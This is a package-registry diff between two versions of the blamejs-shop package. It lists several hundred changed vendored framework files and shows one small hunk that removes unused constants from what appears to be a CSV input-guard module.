@blamejs/blamejs-shop 0.4.56 → 0.4.57

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (397) hide show
  1. package/CHANGELOG.md +2 -0
  2. package/lib/asset-manifest.json +1 -1
  3. package/lib/vendor/MANIFEST.json +426 -366
  4. package/lib/vendor/blamejs/.github/codeql/codeql-config.yml +25 -0
  5. package/lib/vendor/blamejs/.github/workflows/actions-lint.yml +3 -3
  6. package/lib/vendor/blamejs/.github/workflows/cflite_batch.yml +1 -1
  7. package/lib/vendor/blamejs/.github/workflows/cflite_pr.yml +1 -1
  8. package/lib/vendor/blamejs/.github/workflows/ci.yml +13 -13
  9. package/lib/vendor/blamejs/.github/workflows/codeql.yml +8 -7
  10. package/lib/vendor/blamejs/.github/workflows/npm-publish.yml +2 -2
  11. package/lib/vendor/blamejs/.github/workflows/release-container.yml +4 -4
  12. package/lib/vendor/blamejs/.github/workflows/scorecard.yml +1 -1
  13. package/lib/vendor/blamejs/.github/workflows/sha-to-tag-verify.yml +1 -1
  14. package/lib/vendor/blamejs/CHANGELOG.md +2 -0
  15. package/lib/vendor/blamejs/api-snapshot.json +1381 -4
  16. package/lib/vendor/blamejs/eslint.config.mjs +1 -0
  17. package/lib/vendor/blamejs/examples/wiki/lib/source-comment-block-validator.js +4 -1
  18. package/lib/vendor/blamejs/examples/wiki/lib/symbol-index.js +5 -2
  19. package/lib/vendor/blamejs/examples/wiki/routes/pages.js +4 -1
  20. package/lib/vendor/blamejs/fuzz/guard-text.fuzz.js +20 -0
  21. package/lib/vendor/blamejs/index.js +2 -0
  22. package/lib/vendor/blamejs/lib/a2a-tasks.js +7 -23
  23. package/lib/vendor/blamejs/lib/acme.js +6 -5
  24. package/lib/vendor/blamejs/lib/agent-event-bus.js +5 -4
  25. package/lib/vendor/blamejs/lib/agent-idempotency.js +2 -5
  26. package/lib/vendor/blamejs/lib/agent-orchestrator.js +2 -5
  27. package/lib/vendor/blamejs/lib/agent-saga.js +3 -5
  28. package/lib/vendor/blamejs/lib/agent-tenant.js +2 -5
  29. package/lib/vendor/blamejs/lib/ai-adverse-decision.js +2 -15
  30. package/lib/vendor/blamejs/lib/ai-capability.js +1 -6
  31. package/lib/vendor/blamejs/lib/ai-dp.js +1 -5
  32. package/lib/vendor/blamejs/lib/ai-input.js +2 -2
  33. package/lib/vendor/blamejs/lib/ai-pref.js +3 -8
  34. package/lib/vendor/blamejs/lib/ai-quota.js +3 -14
  35. package/lib/vendor/blamejs/lib/api-key.js +37 -28
  36. package/lib/vendor/blamejs/lib/archive-adapters.js +2 -4
  37. package/lib/vendor/blamejs/lib/archive-entry-policy.js +32 -0
  38. package/lib/vendor/blamejs/lib/archive-read.js +5 -17
  39. package/lib/vendor/blamejs/lib/archive-tar-read.js +5 -16
  40. package/lib/vendor/blamejs/lib/archive.js +2 -10
  41. package/lib/vendor/blamejs/lib/arg-parser.js +7 -6
  42. package/lib/vendor/blamejs/lib/asyncapi-traits.js +2 -6
  43. package/lib/vendor/blamejs/lib/atomic-file.js +108 -31
  44. package/lib/vendor/blamejs/lib/audit-chain.js +133 -53
  45. package/lib/vendor/blamejs/lib/audit-daily-review.js +24 -14
  46. package/lib/vendor/blamejs/lib/audit-emit.js +82 -0
  47. package/lib/vendor/blamejs/lib/audit-sign.js +257 -0
  48. package/lib/vendor/blamejs/lib/audit.js +84 -0
  49. package/lib/vendor/blamejs/lib/auth/access-lock.js +5 -27
  50. package/lib/vendor/blamejs/lib/auth/dpop.js +23 -35
  51. package/lib/vendor/blamejs/lib/auth/fido-mds3.js +9 -15
  52. package/lib/vendor/blamejs/lib/auth/jwt-external.js +26 -8
  53. package/lib/vendor/blamejs/lib/auth/jwt.js +13 -15
  54. package/lib/vendor/blamejs/lib/auth/lockout.js +6 -25
  55. package/lib/vendor/blamejs/lib/auth/oauth.js +67 -45
  56. package/lib/vendor/blamejs/lib/auth/oid4vci.js +55 -32
  57. package/lib/vendor/blamejs/lib/auth/oid4vp.js +3 -2
  58. package/lib/vendor/blamejs/lib/auth/openid-federation.js +6 -6
  59. package/lib/vendor/blamejs/lib/auth/passkey.js +3 -3
  60. package/lib/vendor/blamejs/lib/auth/password.js +7 -1
  61. package/lib/vendor/blamejs/lib/auth/saml.js +37 -27
  62. package/lib/vendor/blamejs/lib/auth/sd-jwt-vc-holder.js +2 -14
  63. package/lib/vendor/blamejs/lib/auth/sd-jwt-vc-issuer.js +2 -14
  64. package/lib/vendor/blamejs/lib/auth/sd-jwt-vc.js +1 -1
  65. package/lib/vendor/blamejs/lib/auth/status-list.js +7 -7
  66. package/lib/vendor/blamejs/lib/auth/step-up.js +6 -12
  67. package/lib/vendor/blamejs/lib/auth-bot-challenge.js +6 -37
  68. package/lib/vendor/blamejs/lib/backup/bundle.js +11 -18
  69. package/lib/vendor/blamejs/lib/backup/index.js +14 -47
  70. package/lib/vendor/blamejs/lib/bounded-map.js +112 -1
  71. package/lib/vendor/blamejs/lib/breach-deadline.js +1 -11
  72. package/lib/vendor/blamejs/lib/cache.js +7 -18
  73. package/lib/vendor/blamejs/lib/cbor.js +2 -1
  74. package/lib/vendor/blamejs/lib/cdn-cache-control.js +8 -9
  75. package/lib/vendor/blamejs/lib/cert.js +3 -10
  76. package/lib/vendor/blamejs/lib/chain-writer.js +162 -47
  77. package/lib/vendor/blamejs/lib/cli.js +5 -1
  78. package/lib/vendor/blamejs/lib/client-hints.js +7 -9
  79. package/lib/vendor/blamejs/lib/cloud-events.js +40 -31
  80. package/lib/vendor/blamejs/lib/cluster-storage.js +2 -38
  81. package/lib/vendor/blamejs/lib/cms-codec.js +2 -1
  82. package/lib/vendor/blamejs/lib/codepoint-class.js +67 -1
  83. package/lib/vendor/blamejs/lib/compliance-ai-act-logging.js +1 -6
  84. package/lib/vendor/blamejs/lib/compliance-ai-act-transparency.js +2 -4
  85. package/lib/vendor/blamejs/lib/compliance-eaa.js +1 -11
  86. package/lib/vendor/blamejs/lib/compliance-sanctions-fetcher.js +21 -28
  87. package/lib/vendor/blamejs/lib/compliance-sanctions.js +2 -14
  88. package/lib/vendor/blamejs/lib/compliance.js +2 -9
  89. package/lib/vendor/blamejs/lib/config-drift.js +2 -12
  90. package/lib/vendor/blamejs/lib/content-digest.js +10 -8
  91. package/lib/vendor/blamejs/lib/cookies.js +5 -11
  92. package/lib/vendor/blamejs/lib/cose.js +19 -11
  93. package/lib/vendor/blamejs/lib/cra-report.js +1 -11
  94. package/lib/vendor/blamejs/lib/crypto-field.js +5 -10
  95. package/lib/vendor/blamejs/lib/crypto.js +120 -3
  96. package/lib/vendor/blamejs/lib/csp.js +235 -3
  97. package/lib/vendor/blamejs/lib/daemon.js +42 -41
  98. package/lib/vendor/blamejs/lib/data-act.js +19 -9
  99. package/lib/vendor/blamejs/lib/db-query.js +6 -40
  100. package/lib/vendor/blamejs/lib/db.js +34 -12
  101. package/lib/vendor/blamejs/lib/dbsc.js +5 -6
  102. package/lib/vendor/blamejs/lib/ddl-change-control.js +18 -14
  103. package/lib/vendor/blamejs/lib/deprecate.js +4 -5
  104. package/lib/vendor/blamejs/lib/did.js +6 -2
  105. package/lib/vendor/blamejs/lib/dsr.js +8 -12
  106. package/lib/vendor/blamejs/lib/external-db-migrate.js +21 -22
  107. package/lib/vendor/blamejs/lib/external-db.js +14 -26
  108. package/lib/vendor/blamejs/lib/fda-21cfr11.js +12 -8
  109. package/lib/vendor/blamejs/lib/fdx.js +22 -18
  110. package/lib/vendor/blamejs/lib/file-upload.js +80 -66
  111. package/lib/vendor/blamejs/lib/flag-evaluation-context.js +5 -8
  112. package/lib/vendor/blamejs/lib/framework-error.js +12 -0
  113. package/lib/vendor/blamejs/lib/framework-schema.js +19 -0
  114. package/lib/vendor/blamejs/lib/fsm.js +7 -12
  115. package/lib/vendor/blamejs/lib/gate-contract.js +869 -38
  116. package/lib/vendor/blamejs/lib/gdpr-ropa.js +4 -13
  117. package/lib/vendor/blamejs/lib/graphql-federation.js +1 -1
  118. package/lib/vendor/blamejs/lib/guard-agent-registry.js +2 -1
  119. package/lib/vendor/blamejs/lib/guard-all.js +1 -0
  120. package/lib/vendor/blamejs/lib/guard-archive.js +9 -30
  121. package/lib/vendor/blamejs/lib/guard-auth.js +23 -80
  122. package/lib/vendor/blamejs/lib/guard-cidr.js +20 -96
  123. package/lib/vendor/blamejs/lib/guard-csv.js +135 -196
  124. package/lib/vendor/blamejs/lib/guard-domain.js +23 -106
  125. package/lib/vendor/blamejs/lib/guard-dsn.js +16 -13
  126. package/lib/vendor/blamejs/lib/guard-email.js +46 -53
  127. package/lib/vendor/blamejs/lib/guard-envelope.js +1 -1
  128. package/lib/vendor/blamejs/lib/guard-event-bus-topic.js +2 -1
  129. package/lib/vendor/blamejs/lib/guard-filename.js +12 -60
  130. package/lib/vendor/blamejs/lib/guard-graphql.js +28 -75
  131. package/lib/vendor/blamejs/lib/guard-html-wcag.js +15 -2
  132. package/lib/vendor/blamejs/lib/guard-html.js +65 -117
  133. package/lib/vendor/blamejs/lib/guard-idempotency-key.js +2 -1
  134. package/lib/vendor/blamejs/lib/guard-image.js +280 -77
  135. package/lib/vendor/blamejs/lib/guard-imap-command.js +8 -9
  136. package/lib/vendor/blamejs/lib/guard-json.js +87 -103
  137. package/lib/vendor/blamejs/lib/guard-jsonpath.js +20 -88
  138. package/lib/vendor/blamejs/lib/guard-jwt.js +32 -114
  139. package/lib/vendor/blamejs/lib/guard-list-id.js +2 -7
  140. package/lib/vendor/blamejs/lib/guard-list-unsubscribe.js +2 -7
  141. package/lib/vendor/blamejs/lib/guard-mail-compose.js +5 -6
  142. package/lib/vendor/blamejs/lib/guard-mail-move.js +2 -1
  143. package/lib/vendor/blamejs/lib/guard-mail-query.js +5 -3
  144. package/lib/vendor/blamejs/lib/guard-mail-sieve.js +6 -7
  145. package/lib/vendor/blamejs/lib/guard-managesieve-command.js +5 -4
  146. package/lib/vendor/blamejs/lib/guard-markdown.js +76 -110
  147. package/lib/vendor/blamejs/lib/guard-message-id.js +5 -6
  148. package/lib/vendor/blamejs/lib/guard-mime.js +20 -99
  149. package/lib/vendor/blamejs/lib/guard-oauth.js +19 -73
  150. package/lib/vendor/blamejs/lib/guard-pdf.js +65 -72
  151. package/lib/vendor/blamejs/lib/guard-pop3-command.js +12 -13
  152. package/lib/vendor/blamejs/lib/guard-posture-chain.js +2 -1
  153. package/lib/vendor/blamejs/lib/guard-regex.js +24 -99
  154. package/lib/vendor/blamejs/lib/guard-saga-config.js +2 -1
  155. package/lib/vendor/blamejs/lib/guard-shell.js +22 -87
  156. package/lib/vendor/blamejs/lib/guard-smtp-command.js +8 -11
  157. package/lib/vendor/blamejs/lib/guard-sql.js +15 -13
  158. package/lib/vendor/blamejs/lib/guard-stream-args.js +2 -1
  159. package/lib/vendor/blamejs/lib/guard-svg.js +95 -140
  160. package/lib/vendor/blamejs/lib/guard-template.js +23 -80
  161. package/lib/vendor/blamejs/lib/guard-tenant-id.js +2 -1
  162. package/lib/vendor/blamejs/lib/guard-text.js +592 -0
  163. package/lib/vendor/blamejs/lib/guard-time.js +27 -95
  164. package/lib/vendor/blamejs/lib/guard-uuid.js +21 -93
  165. package/lib/vendor/blamejs/lib/guard-xml.js +76 -106
  166. package/lib/vendor/blamejs/lib/guard-yaml.js +24 -60
  167. package/lib/vendor/blamejs/lib/http-client-cache.js +5 -12
  168. package/lib/vendor/blamejs/lib/http-client-cookie-jar.js +2 -4
  169. package/lib/vendor/blamejs/lib/http-client.js +8 -21
  170. package/lib/vendor/blamejs/lib/http-message-signature.js +3 -2
  171. package/lib/vendor/blamejs/lib/i18n-messageformat.js +5 -7
  172. package/lib/vendor/blamejs/lib/i18n.js +83 -26
  173. package/lib/vendor/blamejs/lib/inbox.js +8 -8
  174. package/lib/vendor/blamejs/lib/incident-report.js +3 -21
  175. package/lib/vendor/blamejs/lib/ip-utils.js +49 -6
  176. package/lib/vendor/blamejs/lib/jobs.js +3 -2
  177. package/lib/vendor/blamejs/lib/keychain.js +6 -18
  178. package/lib/vendor/blamejs/lib/legal-hold.js +6 -15
  179. package/lib/vendor/blamejs/lib/log-stream-cloudwatch.js +44 -112
  180. package/lib/vendor/blamejs/lib/log-stream-otlp-grpc.js +17 -14
  181. package/lib/vendor/blamejs/lib/log-stream-otlp.js +16 -80
  182. package/lib/vendor/blamejs/lib/log-stream-webhook.js +20 -92
  183. package/lib/vendor/blamejs/lib/mail-arc-sign.js +8 -3
  184. package/lib/vendor/blamejs/lib/mail-arf.js +3 -2
  185. package/lib/vendor/blamejs/lib/mail-auth.js +40 -66
  186. package/lib/vendor/blamejs/lib/mail-bimi.js +19 -39
  187. package/lib/vendor/blamejs/lib/mail-crypto-pgp.js +3 -2
  188. package/lib/vendor/blamejs/lib/mail-dav.js +8 -35
  189. package/lib/vendor/blamejs/lib/mail-deploy.js +6 -9
  190. package/lib/vendor/blamejs/lib/mail-dkim.js +19 -38
  191. package/lib/vendor/blamejs/lib/mail-greylist.js +15 -26
  192. package/lib/vendor/blamejs/lib/mail-helo.js +2 -3
  193. package/lib/vendor/blamejs/lib/mail-journal.js +2 -1
  194. package/lib/vendor/blamejs/lib/mail-mdn.js +4 -3
  195. package/lib/vendor/blamejs/lib/mail-rbl.js +5 -8
  196. package/lib/vendor/blamejs/lib/mail-scan.js +2 -2
  197. package/lib/vendor/blamejs/lib/mail-send-deliver.js +33 -20
  198. package/lib/vendor/blamejs/lib/mail-server-imap.js +32 -87
  199. package/lib/vendor/blamejs/lib/mail-server-jmap.js +35 -51
  200. package/lib/vendor/blamejs/lib/mail-server-managesieve.js +29 -83
  201. package/lib/vendor/blamejs/lib/mail-server-mx.js +33 -74
  202. package/lib/vendor/blamejs/lib/mail-server-net.js +177 -0
  203. package/lib/vendor/blamejs/lib/mail-server-pop3.js +30 -83
  204. package/lib/vendor/blamejs/lib/mail-server-rate-limit.js +30 -6
  205. package/lib/vendor/blamejs/lib/mail-server-submission.js +34 -73
  206. package/lib/vendor/blamejs/lib/mail-server-tls.js +89 -0
  207. package/lib/vendor/blamejs/lib/mail-spam-score.js +7 -8
  208. package/lib/vendor/blamejs/lib/mail-store.js +3 -2
  209. package/lib/vendor/blamejs/lib/mail.js +6 -11
  210. package/lib/vendor/blamejs/lib/markup-escape.js +31 -0
  211. package/lib/vendor/blamejs/lib/markup-tokenizer.js +54 -0
  212. package/lib/vendor/blamejs/lib/mcp-tool-registry.js +26 -23
  213. package/lib/vendor/blamejs/lib/mcp.js +1 -1
  214. package/lib/vendor/blamejs/lib/mdoc.js +11 -12
  215. package/lib/vendor/blamejs/lib/metrics.js +32 -30
  216. package/lib/vendor/blamejs/lib/middleware/age-gate.js +3 -23
  217. package/lib/vendor/blamejs/lib/middleware/api-encrypt.js +11 -22
  218. package/lib/vendor/blamejs/lib/middleware/assetlinks.js +2 -7
  219. package/lib/vendor/blamejs/lib/middleware/bearer-auth.js +2 -1
  220. package/lib/vendor/blamejs/lib/middleware/body-parser.js +31 -48
  221. package/lib/vendor/blamejs/lib/middleware/bot-disclose.js +7 -10
  222. package/lib/vendor/blamejs/lib/middleware/bot-guard.js +2 -10
  223. package/lib/vendor/blamejs/lib/middleware/csrf-protect.js +13 -2
  224. package/lib/vendor/blamejs/lib/middleware/daily-byte-quota.js +6 -26
  225. package/lib/vendor/blamejs/lib/middleware/deny-response.js +19 -1
  226. package/lib/vendor/blamejs/lib/middleware/fetch-metadata.js +7 -0
  227. package/lib/vendor/blamejs/lib/middleware/idempotency-key.js +4 -20
  228. package/lib/vendor/blamejs/lib/middleware/rate-limit.js +20 -28
  229. package/lib/vendor/blamejs/lib/middleware/scim-server.js +3 -2
  230. package/lib/vendor/blamejs/lib/middleware/security-headers.js +9 -1
  231. package/lib/vendor/blamejs/lib/middleware/security-txt.js +2 -6
  232. package/lib/vendor/blamejs/lib/middleware/tus-upload.js +12 -27
  233. package/lib/vendor/blamejs/lib/middleware/web-app-manifest.js +2 -7
  234. package/lib/vendor/blamejs/lib/migrations.js +4 -13
  235. package/lib/vendor/blamejs/lib/mime-parse.js +34 -17
  236. package/lib/vendor/blamejs/lib/module-loader.js +44 -0
  237. package/lib/vendor/blamejs/lib/money.js +105 -0
  238. package/lib/vendor/blamejs/lib/mtls-ca.js +116 -36
  239. package/lib/vendor/blamejs/lib/network-byte-quota.js +4 -18
  240. package/lib/vendor/blamejs/lib/network-dane.js +8 -6
  241. package/lib/vendor/blamejs/lib/network-dns-resolver.js +97 -6
  242. package/lib/vendor/blamejs/lib/network-dnssec.js +16 -16
  243. package/lib/vendor/blamejs/lib/network-heartbeat.js +3 -2
  244. package/lib/vendor/blamejs/lib/network-smtp-policy.js +29 -41
  245. package/lib/vendor/blamejs/lib/network-tls.js +40 -42
  246. package/lib/vendor/blamejs/lib/nis2-report.js +1 -11
  247. package/lib/vendor/blamejs/lib/nonce-store.js +81 -3
  248. package/lib/vendor/blamejs/lib/numeric-bounds.js +22 -8
  249. package/lib/vendor/blamejs/lib/object-store/azure-blob-bucket-ops.js +2 -6
  250. package/lib/vendor/blamejs/lib/object-store/azure-blob.js +5 -45
  251. package/lib/vendor/blamejs/lib/object-store/gcs.js +8 -71
  252. package/lib/vendor/blamejs/lib/object-store/http-put.js +1 -5
  253. package/lib/vendor/blamejs/lib/object-store/http-request.js +128 -0
  254. package/lib/vendor/blamejs/lib/object-store/sigv4-bucket-ops.js +2 -1
  255. package/lib/vendor/blamejs/lib/object-store/sigv4.js +9 -77
  256. package/lib/vendor/blamejs/lib/observability-otlp-exporter.js +9 -25
  257. package/lib/vendor/blamejs/lib/observability.js +95 -0
  258. package/lib/vendor/blamejs/lib/openapi-paths-builder.js +7 -3
  259. package/lib/vendor/blamejs/lib/otel-export.js +7 -10
  260. package/lib/vendor/blamejs/lib/outbox.js +43 -37
  261. package/lib/vendor/blamejs/lib/pagination.js +11 -15
  262. package/lib/vendor/blamejs/lib/parsers/safe-env.js +5 -4
  263. package/lib/vendor/blamejs/lib/parsers/safe-ini.js +10 -4
  264. package/lib/vendor/blamejs/lib/parsers/safe-toml.js +11 -9
  265. package/lib/vendor/blamejs/lib/parsers/safe-xml.js +2 -2
  266. package/lib/vendor/blamejs/lib/parsers/safe-yaml.js +7 -6
  267. package/lib/vendor/blamejs/lib/pick.js +63 -5
  268. package/lib/vendor/blamejs/lib/pipl-cn.js +69 -59
  269. package/lib/vendor/blamejs/lib/privacy-pass.js +8 -6
  270. package/lib/vendor/blamejs/lib/problem-details.js +2 -5
  271. package/lib/vendor/blamejs/lib/pubsub.js +4 -8
  272. package/lib/vendor/blamejs/lib/redact.js +2 -1
  273. package/lib/vendor/blamejs/lib/render.js +4 -2
  274. package/lib/vendor/blamejs/lib/request-helpers.js +133 -6
  275. package/lib/vendor/blamejs/lib/restore.js +5 -22
  276. package/lib/vendor/blamejs/lib/retention.js +3 -5
  277. package/lib/vendor/blamejs/lib/safe-async.js +457 -0
  278. package/lib/vendor/blamejs/lib/safe-buffer.js +137 -6
  279. package/lib/vendor/blamejs/lib/safe-decompress.js +2 -1
  280. package/lib/vendor/blamejs/lib/safe-dns.js +2 -1
  281. package/lib/vendor/blamejs/lib/safe-ical.js +12 -26
  282. package/lib/vendor/blamejs/lib/safe-json.js +7 -8
  283. package/lib/vendor/blamejs/lib/safe-jsonpath.js +6 -5
  284. package/lib/vendor/blamejs/lib/safe-mime.js +25 -29
  285. package/lib/vendor/blamejs/lib/safe-redirect.js +2 -5
  286. package/lib/vendor/blamejs/lib/safe-schema.js +7 -6
  287. package/lib/vendor/blamejs/lib/safe-sql.js +126 -0
  288. package/lib/vendor/blamejs/lib/safe-vcard.js +12 -26
  289. package/lib/vendor/blamejs/lib/sandbox-worker.js +9 -2
  290. package/lib/vendor/blamejs/lib/sandbox.js +3 -2
  291. package/lib/vendor/blamejs/lib/scheduler.js +5 -12
  292. package/lib/vendor/blamejs/lib/sec-cyber.js +82 -37
  293. package/lib/vendor/blamejs/lib/seeders.js +4 -11
  294. package/lib/vendor/blamejs/lib/self-update.js +92 -69
  295. package/lib/vendor/blamejs/lib/session-device-binding.js +112 -66
  296. package/lib/vendor/blamejs/lib/session.js +194 -6
  297. package/lib/vendor/blamejs/lib/sql.js +225 -78
  298. package/lib/vendor/blamejs/lib/sse.js +6 -10
  299. package/lib/vendor/blamejs/lib/static.js +136 -98
  300. package/lib/vendor/blamejs/lib/storage.js +4 -2
  301. package/lib/vendor/blamejs/lib/structured-fields.js +275 -16
  302. package/lib/vendor/blamejs/lib/tenant-quota.js +2 -20
  303. package/lib/vendor/blamejs/lib/tsa.js +11 -15
  304. package/lib/vendor/blamejs/lib/validate-opts.js +154 -8
  305. package/lib/vendor/blamejs/lib/vault/seal-pem-file.js +30 -48
  306. package/lib/vendor/blamejs/lib/vault-aad.js +3 -2
  307. package/lib/vendor/blamejs/lib/vc.js +2 -7
  308. package/lib/vendor/blamejs/lib/vex.js +35 -13
  309. package/lib/vendor/blamejs/lib/web-push-vapid.js +23 -20
  310. package/lib/vendor/blamejs/lib/webhook-dispatcher.js +706 -0
  311. package/lib/vendor/blamejs/lib/webhook.js +43 -18
  312. package/lib/vendor/blamejs/lib/websocket-channels.js +9 -7
  313. package/lib/vendor/blamejs/lib/websocket.js +7 -3
  314. package/lib/vendor/blamejs/lib/worm.js +2 -3
  315. package/lib/vendor/blamejs/lib/ws-client.js +8 -10
  316. package/lib/vendor/blamejs/package.json +1 -1
  317. package/lib/vendor/blamejs/release-notes/v0.15.13.json +81 -0
  318. package/lib/vendor/blamejs/scripts/check-changelog-extract.js +1 -1
  319. package/lib/vendor/blamejs/test/00-primitives.js +136 -7
  320. package/lib/vendor/blamejs/test/10-state.js +9 -3
  321. package/lib/vendor/blamejs/test/30-chain.js +40 -0
  322. package/lib/vendor/blamejs/test/helpers/check.js +18 -0
  323. package/lib/vendor/blamejs/test/helpers/db.js +4 -0
  324. package/lib/vendor/blamejs/test/helpers/index.js +1 -0
  325. package/lib/vendor/blamejs/test/integration/audit-chain-external-db.test.js +2 -1
  326. package/lib/vendor/blamejs/test/integration/audit-stack-postgres.test.js +2 -1
  327. package/lib/vendor/blamejs/test/integration/data-layer-mysql.test.js +8 -1
  328. package/lib/vendor/blamejs/test/integration/data-layer-pg.test.js +1 -1
  329. package/lib/vendor/blamejs/test/integration/framework-schema-mysql.test.js +2 -1
  330. package/lib/vendor/blamejs/test/integration/webhook-dispatcher-pg.test.js +269 -0
  331. package/lib/vendor/blamejs/test/layer-0-primitives/atomic-file-fd-read.test.js +149 -0
  332. package/lib/vendor/blamejs/test/layer-0-primitives/audit-framework-namespaces.test.js +51 -0
  333. package/lib/vendor/blamejs/test/layer-0-primitives/audit-sign-anchor.test.js +88 -0
  334. package/lib/vendor/blamejs/test/layer-0-primitives/audit-use-store.test.js +55 -1
  335. package/lib/vendor/blamejs/test/layer-0-primitives/backup-object-store-adapter.test.js +2 -2
  336. package/lib/vendor/blamejs/test/layer-0-primitives/bot-guard.test.js +1 -1
  337. package/lib/vendor/blamejs/test/layer-0-primitives/bounded-map.test.js +129 -0
  338. package/lib/vendor/blamejs/test/layer-0-primitives/chain-writer-multichain.test.js +107 -0
  339. package/lib/vendor/blamejs/test/layer-0-primitives/cli-api-key.test.js +12 -0
  340. package/lib/vendor/blamejs/test/layer-0-primitives/codebase-patterns.test.js +2788 -3214
  341. package/lib/vendor/blamejs/test/layer-0-primitives/codepoint-class.test.js +78 -0
  342. package/lib/vendor/blamejs/test/layer-0-primitives/crypto-base64url.test.js +63 -0
  343. package/lib/vendor/blamejs/test/layer-0-primitives/crypto-hash-stream.test.js +2 -1
  344. package/lib/vendor/blamejs/test/layer-0-primitives/csp-builder.test.js +50 -0
  345. package/lib/vendor/blamejs/test/layer-0-primitives/csp-nonce.test.js +1 -1
  346. package/lib/vendor/blamejs/test/layer-0-primitives/daemon.test.js +2 -1
  347. package/lib/vendor/blamejs/test/layer-0-primitives/defineguard-resolve-opts.test.js +76 -0
  348. package/lib/vendor/blamejs/test/layer-0-primitives/flag.test.js +9 -0
  349. package/lib/vendor/blamejs/test/layer-0-primitives/gate-contract-content-gate.test.js +290 -0
  350. package/lib/vendor/blamejs/test/layer-0-primitives/guard-csv.test.js +84 -0
  351. package/lib/vendor/blamejs/test/layer-0-primitives/guard-email.test.js +78 -0
  352. package/lib/vendor/blamejs/test/layer-0-primitives/guard-filename.test.js +23 -0
  353. package/lib/vendor/blamejs/test/layer-0-primitives/guard-gate-disposition-coverage.test.js +93 -0
  354. package/lib/vendor/blamejs/test/layer-0-primitives/guard-html.test.js +60 -0
  355. package/lib/vendor/blamejs/test/layer-0-primitives/guard-image.test.js +184 -0
  356. package/lib/vendor/blamejs/test/layer-0-primitives/guard-imap-command.test.js +0 -0
  357. package/lib/vendor/blamejs/test/layer-0-primitives/guard-json.test.js +54 -0
  358. package/lib/vendor/blamejs/test/layer-0-primitives/guard-managesieve-command.test.js +10 -0
  359. package/lib/vendor/blamejs/test/layer-0-primitives/guard-markdown.test.js +45 -0
  360. package/lib/vendor/blamejs/test/layer-0-primitives/guard-pdf.test.js +101 -0
  361. package/lib/vendor/blamejs/test/layer-0-primitives/guard-pop3-command.test.js +18 -0
  362. package/lib/vendor/blamejs/test/layer-0-primitives/guard-svg.test.js +76 -0
  363. package/lib/vendor/blamejs/test/layer-0-primitives/guard-text.test.js +365 -0
  364. package/lib/vendor/blamejs/test/layer-0-primitives/guard-xml.test.js +35 -0
  365. package/lib/vendor/blamejs/test/layer-0-primitives/guard-yaml.test.js +36 -0
  366. package/lib/vendor/blamejs/test/layer-0-primitives/i18n.test.js +20 -0
  367. package/lib/vendor/blamejs/test/layer-0-primitives/inbox.test.js +15 -0
  368. package/lib/vendor/blamejs/test/layer-0-primitives/ip-utils.test.js +83 -0
  369. package/lib/vendor/blamejs/test/layer-0-primitives/mail-arf.test.js +10 -0
  370. package/lib/vendor/blamejs/test/layer-0-primitives/mail-auth.test.js +39 -0
  371. package/lib/vendor/blamejs/test/layer-0-primitives/mail-dkim.test.js +36 -0
  372. package/lib/vendor/blamejs/test/layer-0-primitives/mail-greylist.test.js +17 -0
  373. package/lib/vendor/blamejs/test/layer-0-primitives/mail-server-tls.test.js +39 -0
  374. package/lib/vendor/blamejs/test/layer-0-primitives/mail-store.test.js +17 -0
  375. package/lib/vendor/blamejs/test/layer-0-primitives/mime-parse.test.js +106 -0
  376. package/lib/vendor/blamejs/test/layer-0-primitives/money.test.js +17 -0
  377. package/lib/vendor/blamejs/test/layer-0-primitives/mtls-ca-revocation.test.js +98 -0
  378. package/lib/vendor/blamejs/test/layer-0-primitives/nonce-store-release.test.js +77 -0
  379. package/lib/vendor/blamejs/test/layer-0-primitives/observability.test.js +48 -0
  380. package/lib/vendor/blamejs/test/layer-0-primitives/rate-limit-memory-getorinsert.test.js +100 -0
  381. package/lib/vendor/blamejs/test/layer-0-primitives/request-helpers.test.js +88 -0
  382. package/lib/vendor/blamejs/test/layer-0-primitives/safe-async-loops.test.js +278 -0
  383. package/lib/vendor/blamejs/test/layer-0-primitives/safe-buffer-linear-scans.test.js +37 -0
  384. package/lib/vendor/blamejs/test/layer-0-primitives/safe-jsonpath.test.js +14 -0
  385. package/lib/vendor/blamejs/test/layer-0-primitives/sandbox.test.js +19 -0
  386. package/lib/vendor/blamejs/test/layer-0-primitives/security-headers.test.js +1 -1
  387. package/lib/vendor/blamejs/test/layer-0-primitives/self-update.test.js +2 -1
  388. package/lib/vendor/blamejs/test/layer-0-primitives/session-device-binding.test.js +18 -0
  389. package/lib/vendor/blamejs/test/layer-0-primitives/session-extensions.test.js +1 -1
  390. package/lib/vendor/blamejs/test/layer-0-primitives/session-valid-from.test.js +73 -0
  391. package/lib/vendor/blamejs/test/layer-0-primitives/sql.test.js +100 -0
  392. package/lib/vendor/blamejs/test/layer-0-primitives/structured-fields.test.js +80 -0
  393. package/lib/vendor/blamejs/test/layer-0-primitives/validate-opts-shape.test.js +235 -0
  394. package/lib/vendor/blamejs/test/layer-0-primitives/webhook-dispatcher.test.js +374 -0
  395. package/lib/vendor/blamejs/test/layer-0-primitives/webhook.test.js +75 -8
  396. package/lib/vendor/blamejs/test/layer-5-integration/guard-host-integration.test.js +3 -3
  397. package/package.json +1 -1
@@ -113,7 +113,6 @@ var BIDI_RE = codepointClass.BIDI_RE;
113
113
  var BIDI_RE_G = codepointClass.BIDI_RE_G;
114
114
  var C0_CTRL_RE = codepointClass.C0_CTRL_RE;
115
115
  var C0_CTRL_RE_G = codepointClass.C0_CTRL_RE_G;
116
- var ZERO_WIDTH_RE = codepointClass.ZERO_WIDTH_RE;
117
116
  var ZW_RE_G = codepointClass.ZW_RE_G;
118
117
  var NULL_RE_G = codepointClass.NULL_RE_G;
119
118
  var HOMOGLYPH_RE = new RegExp("[" + _charClass(HOMOGLYPH_RANGES) + "]"); // allow:dynamic-regex — codepoints from HOMOGLYPH_RANGES literal table
@@ -157,12 +156,6 @@ var FORMULA_PREFIXES = Object.freeze(_stringFromCps(FORMULA_PREFIX_CPS).split(""
157
156
  // Default row count cap for serialize. 2^20 ~ 1M rows.
158
157
  var DEFAULT_MAX_ROWS = 0x100000;
159
158
 
160
- // Forensic-snippet sizes per compliance posture.
161
- var FORENSIC_SNIPPET_HIPAA = C.BYTES.bytes(256);
162
- var FORENSIC_SNIPPET_PCI_DSS = C.BYTES.bytes(256);
163
- var FORENSIC_SNIPPET_GDPR = C.BYTES.bytes(128);
164
- var FORENSIC_SNIPPET_SOC2 = C.BYTES.bytes(512);
165
-
166
159
  // ---- Profile presets ----
167
160
 
168
161
  var PROFILES = Object.freeze({
